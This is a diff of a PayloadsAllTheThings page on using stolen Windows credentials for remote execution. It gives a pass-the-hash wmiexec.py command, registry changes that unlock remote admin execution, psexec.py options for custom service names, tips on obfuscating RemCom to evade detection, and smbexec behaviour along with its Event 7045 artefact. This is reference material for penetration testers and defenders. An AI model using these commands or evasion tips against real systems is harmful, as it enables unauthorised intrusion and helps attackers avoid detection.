swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Windows - Using credentials.md

     wmiexec.py DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
     ```

+To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute:
+`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1`
+To prevent RID 500 from being able to WmiExec or PsExec, execute:
+`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1`

 ### PSExec

+Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name.
-PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections [snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb)
+PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb))

 Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe`

 Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`.
 You need to update the pipe name to match "Custom_communication" in the line 163
-`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`
+`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`.
+Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files).

 ### WMIExec

 Use a non default share `-share SHARE` to write the output to reduce the detection.
 By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`

+### SMBExec

+It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)).

+It will create a new service every time we execute a command.
+It will also generate an Event 7045.

+By default this command is execute: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`.

 ## RDP Remote Desktop Protocol